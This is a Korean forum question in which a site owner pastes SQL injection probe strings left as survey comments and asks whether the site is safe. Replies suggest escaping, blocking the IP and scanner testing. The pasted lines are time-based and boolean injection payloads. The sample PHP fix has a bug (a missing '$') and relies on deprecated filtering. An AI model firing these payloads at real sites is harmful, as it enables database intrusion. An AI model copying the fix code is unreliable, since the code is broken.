디비인젝션 공격
본문
G MBWUpmEH 2023-07-23 04:59:21삭제
@@RRTki
G MBWUpmEH 2023-07-23 04:59:20삭제
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
G MBWUpmEH 2023-07-23 04:59:12삭제
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
G MBWUpmEH 2023-07-23 04:59:01삭제
mgXUgM0m')) OR 319=(SELECT 319 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:58:45삭제
l21MgpwA') OR 673=(SELECT 673 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:58:31삭제
3myT6qQC' OR 876=(SELECT 876 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:58:20삭제
-1)) OR 430=(SELECT 430 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:58:08삭제
-5) OR 243=(SELECT 243 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:57:30삭제
-5 OR 393=(SELECT 393 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:57:04삭제
jLC93o12'; waitfor delay '0:0:15' --
G MBWUpmEH 2023-07-23 04:56:40삭제
1 waitfor delay '0:0:15' --
G MBWUpmEH 2023-07-23 04:56:13삭제
-1); waitfor delay '0:0:15' --
G MBWUpmEH 2023-07-23 04:55:55삭제
-1; waitfor delay '0:0:15' --
G MBWUpmEH 2023-07-23 04:55:37삭제
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
G MBWUpmEH 2023-07-23 04:55:18삭제
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
G MBWUpmEH 2023-07-23 04:54:58삭제
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
G MBWUpmEH 2023-07-23 04:54:40삭제
if(now()=sysdate(),sleep(15),0)
G MBWUpmEH 2023-07-23 04:54:24삭제
-1" OR 2+462-462-1=0+0+0+1 --
G MBWUpmEH 2023-07-23 04:54:24삭제
-1' OR 2+276-276-1=0+0+0+1 or 'eI1jHuYI'='
G MBWUpmEH 2023-07-23 04:54:24삭제
-1' OR 2+493-493-1=0+0+0+1 --
G MBWUpmEH 2023-07-23 04:54:23삭제
-1 OR 2+537-537-1=0+0+0+1
G MBWUpmEH 2023-07-23 04:54:23삭제
-1 OR 2+650-650-1=0+0+0+1 --
----------------------------
설문조사를 오픈했놨더니 댓글에 이런 메세지가 가득하네요..
인젝션 공격이라는데... 패치 잘 되어 있으면 문제 없는 거죠...?
ㅠ.ㅠ
답변 3
SQL 인젝션인데 댓글에 그대로 INSERT 된 것을 보면 문제는 없을 가능성이 있구요.
댓글 입력 처리에 mysqli_real_escape_string(); 을 사용하고
혹시 모르니 사용자 댓글 출력 시 이스케이프 처리도 필요할 것 같습니다.
// 사용자 입력을 필터링하여 적절한 형식인지 확인
$comment = $_POST['comment'];
$comment = filter_var($comment, FILTER_SANITIZE_STRING);
// 데이터베이스로부터 가져온 변수 출력 시 HTML 이스케이프 적용
echo htmlspecialchars(comment, ENT_QUOTES, 'UTF-8');
해당아이피가 어디서 등록되는지 보시고 막으시는걸 권유드립니다.
Accunetix 와 같은 전용 웹 공격 테스트 환경을 구축하고 테스트해보셔야 합니다.
Acunetix는 보통 10만개 이상의 공격패턴으로 공격하여 그 결과에 따라 위험도를 등급으로 표식하고, 그 해결방도를 제안해줍니다.
구체적인 내용을 알고싶으시면, 연계주세요.